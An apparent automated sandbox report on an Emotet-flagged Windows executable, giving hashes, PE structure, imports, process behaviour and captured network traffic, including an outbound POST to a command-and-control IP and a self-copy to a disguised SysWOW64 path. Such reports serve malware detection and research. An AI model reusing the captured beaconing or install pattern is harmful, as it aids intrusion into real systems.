                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.559911513630365
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.53%
                                                    • InstallShield setup (43055/19) 0.43%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:NWMEaRqF7s.exe
                                                    File size:352256
                                                    MD5:0ba53dbed762655999bd37a1d8bee9db
                                                    SHA1:4566e7559e5c4287a25796ed622324a6b5b70e63
                                                    SHA256:77ed3ca0af1fec8c76e4f77114090edec76040713e53f6682151b53d79f28c79
                                                    SHA512:4849e922fe8e2dbc1ee2feaf4fca47242ff3a75735cb2040475314e2a233876d6435075c18786f00983467dac9c4022220a98d1e05b2adf7333faa245457fd11
                                                    SSDEEP:6144:rr/JAPRthhyJrZ/489mw42uDLnduy88ij484V4JFN:ehorZQ88LLnduy5L4LN

                                                    File Icon

                                                    Icon Hash:1872c45ed6d4d400

                                                    Static PE Info

                                                    General

                                                    Entrypoint: 0x41f6c5
                                                    Entrypoint Section: .text
                                                    Digitally signed: false
                                                    Imagebase: 0x400000
                                                    Subsystem: windows gui
                                                    Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                    DLL Characteristics:
                                                    Time Stamp: 0x5F527454 [Fri Sep 4 17:07:32 2020 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major: 4
                                                    OS Version Minor: 0
                                                    File Version Major: 4
                                                    File Version Minor: 0
                                                    Subsystem Version Major: 4
                                                    Subsystem Version Minor: 0
                                                    Import Hash: 756fdea446bc618b4804509775306c0d

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007FD338F46EE5h
                                                    jmp 00007FD338F3F01Bh
                                                    push 00000000h
                                                    push dword ptr [esp+14h]
                                                    push dword ptr [esp+14h]
                                                    push dword ptr [esp+14h]
                                                    push dword ptr [esp+14h]
                                                    call 00007FD338F46F5Dh
                                                    add esp, 14h
                                                    ret
                                                    push eax
                                                    push dword ptr fs:[00000000h]
                                                    lea eax, dword ptr [esp+0Ch]
                                                    sub esp, dword ptr [esp+0Ch]
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    mov dword ptr [eax], ebp
                                                    mov ebp, eax
                                                    mov eax, dword ptr [00443590h]
                                                    xor eax, ebp
                                                    push eax
                                                    push dword ptr [ebp-04h]
                                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                                    lea eax, dword ptr [ebp-0Ch]
                                                    mov dword ptr fs:[00000000h], eax
                                                    ret
                                                    push eax
                                                    push dword ptr fs:[00000000h]
                                                    lea eax, dword ptr [esp+0Ch]
                                                    sub esp, dword ptr [esp+0Ch]
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    mov dword ptr [eax], ebp
                                                    mov ebp, eax
                                                    mov eax, dword ptr [00443590h]
                                                    xor eax, ebp
                                                    push eax
                                                    mov dword ptr [ebp-10h], esp
                                                    push dword ptr [ebp-04h]
                                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                                    lea eax, dword ptr [ebp-0Ch]
                                                    mov dword ptr fs:[00000000h], eax
                                                    ret
                                                    push eax
                                                    push dword ptr fs:[00000000h]
                                                    lea eax, dword ptr [esp+0Ch]
                                                    sub esp, dword ptr [esp+0Ch]
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    mov dword ptr [eax], ebp
                                                    mov ebp, eax
                                                    mov eax, dword ptr [00443590h]
                                                    xor eax, ebp
                                                    push eax
                                                    mov dword ptr [ebp-10h], eax
                                                    push dword ptr [ebp-04h]
                                                    mov dword ptr [ebp-04h], FFFFFFFFh
                                                    lea eax, dword ptr [ebp-0Ch]
                                                    mov dword ptr fs:[00000000h], eax
                                                    ret
                                                    push eax
                                                    push dword ptr fs:[00000000h]

                                                    Rich Headers

                                                    Programming Language:
                                                    • [RES] VS2005 build 50727
                                                    • [ C ] VS2005 build 50727
                                                    • [EXP] VS2005 build 50727
                                                    • [C++] VS2005 build 50727
                                                    • [ASM] VS2005 build 50727
                                                    • [LNK] VS2005 build 50727

                                                    Data Directories

                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x41760 | 0x50 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3fb5c | 0xf0 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x49000 | 0x101e8 | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39b50 | 0x40 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x34000 | 0x54c | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3fad4 | 0x40 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                    Sections

                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x1000 | 0x32dc9 | 0x33000 | False | 0.582754097733 | data | 6.63975517719 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rdata | 0x34000 | 0xd7b0 | 0xe000 | False | 0.320853097098 | data | 4.82193271055 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data | 0x42000 | 0x651c | 0x3000 | False | 0.263346354167 | data | 3.89182813108 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                    .rsrc | 0x49000 | 0x101e8 | 0x11000 | False | 0.712158203125 | data | 7.01664902177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    Name | RVA | Size | Type | Language | Country
                                                    RT_CURSOR | 0x49c10 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x49d44 | 0xb4 | data | English | United States
                                                    RT_CURSOR | 0x49df8 | 0x134 | AmigaOS bitmap font | English | United States
                                                    RT_CURSOR | 0x49f2c | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a060 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a194 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a2c8 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a3fc | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a530 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a664 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a798 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4a8cc | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4aa00 | 0x134 | AmigaOS bitmap font | English | United States
                                                    RT_CURSOR | 0x4ab34 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4ac68 | 0x134 | data | English | United States
                                                    RT_CURSOR | 0x4ad9c | 0x134 | data | English | United States
                                                    RT_BITMAP | 0x4aed0 | 0xb58 | data | English | United States
                                                    RT_BITMAP | 0x4ba28 | 0xb8 | data | English | United States
                                                    RT_BITMAP | 0x4bae0 | 0x144 | data | English | United States
                                                    RT_ICON | 0x4bc24 | 0x2e8 | data | English | United States
                                                    RT_ICON | 0x4bf0c | 0x8a8 | data | English | United States
                                                    RT_ICON | 0x4c7b4 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                                                    RT_DIALOG | 0x4c8dc | 0x11c | data | English | United States
                                                    RT_DIALOG | 0x4c9f8 | 0x3be | data | English | United States
                                                    RT_DIALOG | 0x4cdb8 | 0xe8 | data | English | United States
                                                    RT_DIALOG | 0x4cea0 | 0x34 | data | English | United States
                                                    RT_STRING | 0x4ced4 | 0x5c | data | English | United States
                                                    RT_STRING | 0x4cf30 | 0x82 | data | English | United States
                                                    RT_STRING | 0x4cfb4 | 0x2a | data | English | United States
                                                    RT_STRING | 0x4cfe0 | 0x192 | data | English | United States
                                                    RT_STRING | 0x4d174 | 0x4e2 | data | English | United States
                                                    RT_STRING | 0x4d658 | 0x31a | data | English | United States
                                                    RT_STRING | 0x4d974 | 0x2dc | data | English | United States
                                                    RT_STRING | 0x4dc50 | 0x8a | data | English | United States
                                                    RT_STRING | 0x4dcdc | 0xac | data | English | United States
                                                    RT_STRING | 0x4dd88 | 0xde | data | English | United States
                                                    RT_STRING | 0x4de68 | 0x4c4 | data | English | United States
                                                    RT_STRING | 0x4e32c | 0x264 | data | English | United States
                                                    RT_STRING | 0x4e590 | 0x2c | data | English | United States
                                                    RT_STRING | 0x4e5bc | 0x42 | data | English | United States
                                                    RT_GROUP_CURSOR | 0x4e600 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e624 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e638 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e64c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e660 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e674 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e688 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e69c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e6b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e6c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e6d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e6ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e700 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e714 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_CURSOR | 0x4e728 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
                                                    RT_GROUP_ICON | 0x4e73c | 0x30 | data | English | United States
                                                    RT_VERSION | 0x4e76c | 0x2f0 | SysEx File - IDP | English | United States
                                                    RT_MANIFEST | 0x4ea5c | 0x56 | ASCII text, with CRLF line terminators | English | United States
                                                    None | 0x4eab4 | 0xa733 | data | English | United States

                                                    Imports

                                                    DLL | Import
                                                    KERNEL32.dll | GetFileTime, GetTickCount, HeapFree, RtlUnwind, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, HeapAlloc, HeapReAlloc, GetCommandLineA, GetProcessHeap, GetStartupInfoA, RaiseException, ExitProcess, HeapSize, HeapDestroy, HeapCreate, VirtualFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, LCMapStringA, GetFileAttributesA, GetStdHandle, Sleep, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, FileTimeToLocalFileTime, SetErrorMode, FileTimeToSystemTime, GetOEMCP, GetCPInfo, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetThreadLocale, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, InterlockedDecrement, GetModuleFileNameW, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, WritePrivateProfileStringA, FreeResource, GetCurrentProcessId, GlobalAddAtomA, CloseHandle, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, LoadLibraryA, lstrcmpA, FreeLibrary, GlobalDeleteAtom, GetModuleHandleA, SetLastError, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, MulDiv, LoadResource, LockResource, SizeofResource, FindResourceA, LoadLibraryW, GetProcAddress, GetLastError, lstrlenA, WideCharToMultiByte, CompareStringA, CompareStringW, MultiByteToWideChar, GetVersion, LCMapStringW, InterlockedExchange
                                                    USER32.dll | UnregisterClassA, RegisterClipboardFormatA, PostThreadMessageA, ReleaseCapture, SetCapture, LoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, DestroyMenu, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, GetClassLongA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, MessageBeep, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, EqualRect, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, CharUpperA, EnableWindow, LoadIconA, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, GetNextDlgGroupItem, InvalidateRgn, InvalidateRect, SetRect, IsRectEmpty, SetCursor, SetWindowsHookExA, CopyAcceleratorTableA, CharNextA, GetForegroundWindow, SendMessageA, AppendMenuA, GetSystemMenu, DrawIcon, GetClientRect, GetSystemMetrics, IsIconic, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, PostQuitMessage, PostMessageA, CheckMenuItem, EnableMenuItem, ModifyMenuA, GetParent, GetFocus, LoadBitmapA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, GetActiveWindow, DispatchMessageA, TranslateMessage, GetMessageA, CallNextHookEx, GetClassNameA
                                                    GDI32.dll | ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, SetWindowExtEx, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, TextOutA, RectVisible, PtVisible, GetDeviceCaps, GetViewportExtEx, DeleteObject, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetWindowExtEx
                                                    comdlg32.dll | GetFileTitleA
                                                    WINSPOOL.DRV | DocumentPropertiesA, OpenPrinterA, ClosePrinter
                                                    ADVAPI32.dll | RegOpenKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegCloseKey, RegOpenKeyA, RegSetValueExA, RegCreateKeyExA, RegQueryValueExA
                                                    COMCTL32.dll |
                                                    SHLWAPI.dll | PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                    oledlg.dll |
                                                    ole32.dll | OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CoRevokeClassObject, CoTaskMemAlloc, CoTaskMemFree, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CLSIDFromProgID
                                                    OLEAUT32.dll | SysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, VariantTimeToSystemTime, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysFreeString

                                                    Exports

                                                    Name | Ordinal | Address
                                                    UUACZDADWAJJJJJ | 1 | 0x401b20

                                                    Version Infos

                                                    Description | Data
                                                    LegalCopyright | Free to redistribute!
                                                    InternalName | cmdcmxcfg.exe
                                                    FileVersion | 1.0.0.1
                                                    CompanyName | Shaun Harrington
                                                    ProductName | CMDCMX
                                                    ProductVersion | 1.0.0.1
                                                    FileDescription | CMDCMX Configuration Application
                                                    OriginalFilename | cmdcmxcfg.exe
                                                    Translation | 0x0409 0x04e4

                                                    Possible Origin

                                                    Language of compilation system | Country where language is spoken
                                                    English | United States

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    07/07/21-14:28:38.396607 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 108.167.138.154 | 192.168.2.6
                                                    07/07/21-14:28:38.396630 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 108.167.138.154 | 192.168.2.6
                                                    07/07/21-14:28:47.404931 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 108.167.138.154 | 192.168.2.6

                                                    Network Port Distribution

                                                    TCP Packets


                                                    UDP Packets

                                                    Jul 7, 2021 14:28:37.026374102 CEST53621168.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:37.476521015 CEST6381653192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:37.537182093 CEST53638168.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:37.989124060 CEST5501453192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:38.044928074 CEST53550148.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:38.662561893 CEST6220853192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:38.718909979 CEST53622088.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:39.235913038 CEST5757453192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:39.286719084 CEST53575748.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:39.859911919 CEST5181853192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:39.914607048 CEST53518188.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:40.705108881 CEST5662853192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:40.760854959 CEST53566288.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:41.942483902 CEST6077853192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:42.004492998 CEST53607788.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:42.462431908 CEST5379953192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:42.524993896 CEST53537998.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:51.923923016 CEST5468353192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:51.987834930 CEST53546838.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:53.545835018 CEST5932953192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:53.602031946 CEST53593298.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:28:55.780323982 CEST6402153192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:28:55.843420982 CEST53640218.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:29:12.436503887 CEST5612953192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:29:12.494874001 CEST53561298.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:29:26.754261017 CEST5817753192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:29:26.825819016 CEST53581778.8.8.8192.168.2.6
                                                    Jul 7, 2021 14:29:28.951379061 CEST5070053192.168.2.68.8.8.8
                                                    Jul 7, 2021 14:29:29.013977051 CEST53507008.8.8.8192.168.2.6

                                                    HTTP Request Dependency Graph

                                                    • 142.44.137.67:443

                                                    HTTP Packets

                                                    Session ID: 0
                                                    Source IP: 192.168.2.6
                                                    Source Port: 49731
                                                    Destination IP: 142.44.137.67
                                                    Destination Port: 443
                                                    Process: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

                                                    Timestamp: Jul 7, 2021 14:28:32.245615959 CEST
                                                    kBytes transferred: 1304
                                                    Direction: OUT
                                                    Data:
                                                    POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                    Host: 142.44.137.67:443
                                                    Content-Length: 4612
                                                    Connection: Keep-Alive
                                                    Cache-Control: no-cache

                                                    Timestamp: Jul 7, 2021 14:28:32.383486032 CEST
                                                    kBytes transferred: 1309
                                                    Direction: IN
                                                    Data:
                                                    HTTP/1.1 400 Bad Request
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 07 Jul 2021 12:28:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 666
                                                    Connection: close
                                                    Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Memory Usage

                                                    High Level Behavior Distribution

                                                    Behavior

                                                    System Behavior

                                                    General

                                                    Start time:14:27:48
                                                    Start date:07/07/2021
                                                    Path:C:\Users\user\Desktop\NWMEaRqF7s.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\NWMEaRqF7s.exe'
                                                    Imagebase:0x400000
                                                    File size:352256 bytes
                                                    MD5 hash:0BA53DBED762655999BD37A1D8BEE9DB
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:14:27:49
                                                    Start date:07/07/2021
                                                    Path:C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                                                    Imagebase:0x400000
                                                    File size:352256 bytes
                                                    MD5 hash:0BA53DBED762655999BD37A1D8BEE9DB
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:14:27:56
                                                    Start date:07/07/2021
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                    Imagebase:0x7ff6b7590000
                                                    File size:51288 bytes
                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:28:16
                                                    Start date:07/07/2021
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                    Imagebase:0x7ff6b7590000
                                                    File size:51288 bytes
                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:28:25
                                                    Start date:07/07/2021
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                    Imagebase:0x7ff6b7590000
                                                    File size:51288 bytes
                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:28:33
                                                    Start date:07/07/2021
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                    Imagebase:0x7ff6b7590000
                                                    File size:51288 bytes
                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:14:29:08
                                                    Start date:07/07/2021
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                    Imagebase:0x7ff6b7590000
                                                    File size:51288 bytes
                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                      Execution Graph

                                                      Execution Coverage:4.7%
                                                      Dynamic/Decrypted Code Coverage:21.7%
                                                      Signature Coverage:15.7%
                                                      Total number of Nodes:980
                                                      Total number of Limit Nodes:97

                                                      Graph

GlobalUnlock GlobalFree 30832->30834 30833->30832 30834->30809 30835->30675 30836->30684 30837->30694 30838->30683 30839->30693 30840->30680 30841->30679 30842->30696 30844 405986 GetWindowLongA 30843->30844 30845 40596b 30843->30845 30846 405996 GetParent 30844->30846 30847 40597d 30844->30847 30861 405880 105 API calls _Error_objects 30845->30861 30849 405979 30846->30849 30850 4059b0 30847->30850 30851 4059a7 GetParent 30847->30851 30849->30844 30849->30847 30853 4059c1 30850->30853 30854 4059b8 GetLastActivePopup 30850->30854 30851->30850 30851->30851 30852 405970 30852->30849 30862 403ed6 111 API calls 30852->30862 30855 4059e9 30853->30855 30857 4059cd IsWindowEnabled 30853->30857 30854->30853 30855->30781 30857->30855 30858 4059d8 30857->30858 30858->30855 30859 4059dc EnableWindow 30858->30859 30859->30855 30860->30777 30861->30852 30862->30849 30863->30793 30866 40db94 ctype 111 API calls 30865->30866 30867 40c57d _memset 30866->30867 30868 40db94 ctype 111 API calls 30867->30868 30906 4061da 30867->30906 30869 40c5b5 30868->30869 30870 40c5e6 30869->30870 30935 40c38e 117 API calls 3 library calls 30869->30935 30872 40c608 30870->30872 30936 40c38e 117 API calls 3 library calls 30870->30936 30874 40c62f 30872->30874 30937 40c38e 117 API calls 3 library calls 30872->30937 30876 40c655 30874->30876 30938 40c531 119 API calls ctype 30874->30938 30878 40c682 30876->30878 30939 40c531 119 API calls ctype 30876->30939 30880 40c6a3 30878->30880 30923 40a1c2 